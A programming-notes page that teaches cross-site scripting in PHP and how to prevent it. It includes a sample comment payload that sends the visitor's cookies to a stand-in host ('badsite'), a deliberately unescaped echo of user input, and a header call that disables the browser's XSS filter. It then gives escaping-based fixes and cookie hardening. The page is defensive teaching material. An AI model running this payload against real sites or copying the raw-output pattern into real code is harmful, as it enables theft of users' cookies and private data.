PROGRAMMING

 
REMEMBERS




Last update:   29-10-2021

Cross Site Scripting

This attack works only when the application writes user-supplied data into the page without escaping it for the context it lands in (HTML body, attribute value, script block). It is therefore straightforward to prevent: escape on output. Some older browsers shipped a built-in reflected-XSS filter controlled by the X-XSS-Protection header (Chrome removed its filter in 2019 and Firefox never implemented one), so the test example below disables it explicitly to keep the demo reproducible in a browser that still honours it. The header() call must run before any output is sent.
 
<?php header('X-XSS-Protection:0'); ?>

<!-- Logged user data in Cookie -->
<script>
    function setCookie(c_name,value,exdays) {
        var exdate=new Date();
            exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays==null) ? "" : 
                "; expires="+exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }
    setCookie('username', 'john');
    setCookie('email', 'john@yahoo.com'); // Look Here
</script>

<!-- User submit malicious comment -->
<form method="POST">
    Add a comment: 
    <textarea name="comment">
        <script> 
            document.location = 
                "badsite/test.php?cookies="+ document.cookie; 
        </script>
    </textarea>
    <input type="submit" name="btn_submit"/>
</form>
 
Submitted comment is displayed
 
if (isset($_POST['btn_submit'])) {
    if (!empty($_POST['comment'])) {

        echo $_POST['comment']; // Look Here: raw output, the injected <script> runs in the viewer's browser

        // The injected script redirects the viewer to:
        // badsite/test.php?cookies=username=john;%20email=john@yahoo.com
        // (document.cookie joins cookies with "; ") and exposes the
        // logged-in user's private data

        // Solution // Look Here: escape on output, for the HTML context the value lands in
        echo htmlspecialchars($_POST['comment'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        // (the original used FILTER_SANITIZE_STRING, a tag stripper rather than
        //  an escaper, which is deprecated since PHP 8.1)
    }
}
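The same comment page, with the displayed value escaped for each context it is written into, plus the cookie hardening that limits the damage of a missed escape. This is an added example, not code from the original page; the function names h(), js() and render_comment() are illustrative, and the sample comment is the payload from the textarea above.

```php
<?php
// Added example (not from the original page). Escapes the submitted comment
// for the context it lands in: HTML text, a double-quoted attribute, and a
// JavaScript string literal inside a <script> block.
declare(strict_types=1);

// HTML text and attribute context: encode & < > " ' and replace invalid UTF-8
// instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// JavaScript string context: json_encode produces a valid JS literal, and the
// HEX flags encode < > & ' " so that "</script>" cannot close the block early.
function js(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// One value, three output contexts, three escapers. Escaping happens here, at
// the point of output, not when the comment is stored.
function render_comment(string $comment): string
{
    return '<div class="comment" data-raw="' . h($comment) . '">'
         . h($comment)
         . '</div>'
         . '<script>console.log(' . js($comment) . ');</script>';
}

// Constructed sample input: the malicious comment from the page's textarea.
$payload = '<script>document.location="badsite/test.php?cookies="+document.cookie;</script>';

if (PHP_SAPI !== 'cli') {
    // Headers must be sent before any output. Declaring the charset stops the
    // browser from sniffing an encoding in which the escaping would not hold.
    header('Content-Type: text/html; charset=UTF-8');

    // Defence in depth: a cookie set server-side with HttpOnly is not visible to
    // document.cookie, so a script that does slip through cannot read it. The
    // page sets its cookies from JavaScript, where HttpOnly cannot be applied.
    setcookie('email', 'john@yahoo.com', [
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

$comment = $_POST['comment'] ?? $payload;
echo render_comment($comment), PHP_EOL;
```

Run from the command line it prints the escaped markup for the sample payload: the `<script>` tag comes out as `&lt;script&gt;` in the div and as `"\u003Cscript\u003E..."` inside the console.log call, so the browser renders the comment as text instead of executing it. Served through a web server, a POST from the page's form goes through the same path.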
 
